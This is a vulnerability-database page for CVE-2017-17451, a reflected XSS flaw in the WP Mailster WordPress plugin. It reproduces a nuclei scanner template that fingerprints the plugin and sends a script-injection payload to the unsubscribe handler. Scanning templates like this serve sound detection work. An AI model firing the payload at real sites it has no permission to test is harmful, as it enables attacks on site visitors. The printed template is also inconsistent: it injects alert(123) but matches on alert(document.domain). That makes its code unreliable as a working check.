Lucene search
K

WordPress Mailster <=1.5.4 - Cross-Site Scripting

🗓️ 15 Jun 2026 07:03:58Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 16 Views

WordPress Mailster 1.5.4 - Cross-Site Scripting via unsubscribe handle

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2017-17451
7 Dec 201700:29
attackerkb
CNVD
WordPress WP Mailster Plugin Cross-Site Scripting Vulnerability
7 Dec 201700:00
cnvd
CVE
CVE-2017-17451
7 Dec 201700:00
cve
Cvelist
CVE-2017-17451
7 Dec 201700:00
cvelist
NVD
CVE-2017-17451
7 Dec 201700:29
nvd
OSV
CVE-2017-17451
7 Dec 201700:29
osv
Prion
Code injection
7 Dec 201700:29
prion
WPVulnDB
WP Mailster <= 1.5.4 - Unauthenticated Cross-Site Scripting (XSS)
5 Dec 201700:00
wpvulndb
id: CVE-2017-17451

info:
  name: WordPress Mailster <=1.5.4 - Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: WordPress Mailster 1.5.4 and before contains a cross-site scripting vulnerability in the unsubscribe handler via the mes parameter to view/subscription/unsubscribe2.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.
  remediation: |
    Update to the latest version of the WordPress Mailster plugin (>=1.5.5) which includes a fix for this vulnerability.
  reference:
    - https://wordpress.org/plugins/wp-mailster/#developers
    - https://packetstormsecurity.com/files/145222/WordPress-WP-Mailster-1.5.4.0-Cross-Site-Scripting.html
    - https://wpvulndb.com/vulnerabilities/8973
    - https://nvd.nist.gov/vuln/detail/CVE-2017-17451
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2017-17451
    cwe-id: CWE-79
    epss-score: 0.14343
    epss-percentile: 0.94592
    cpe: cpe:2.3:a:wpmailster:wp_mailster:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: wpmailster
    product: "wp_mailster"
    framework: wordpress
  tags: cve,cve2017,wordpress,xss,wp-plugin,packetstorm,wpmailster,vuln
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/wp-mailster/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - 'WP Mailster ='

  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</script><script>alert(document.domain)</script>"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4b0a0048304602210092824dfbf2414ea7c78ec832d822bb38f220f0834f2b9c37d3e6d7f7498d9fb2022100fd7a21550c6dd729696f740c4aeea0c4a0ba26704e9a922bdc1fbe5975f15b25:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 24.3
CVSS 36.1
EPSS0.14343
16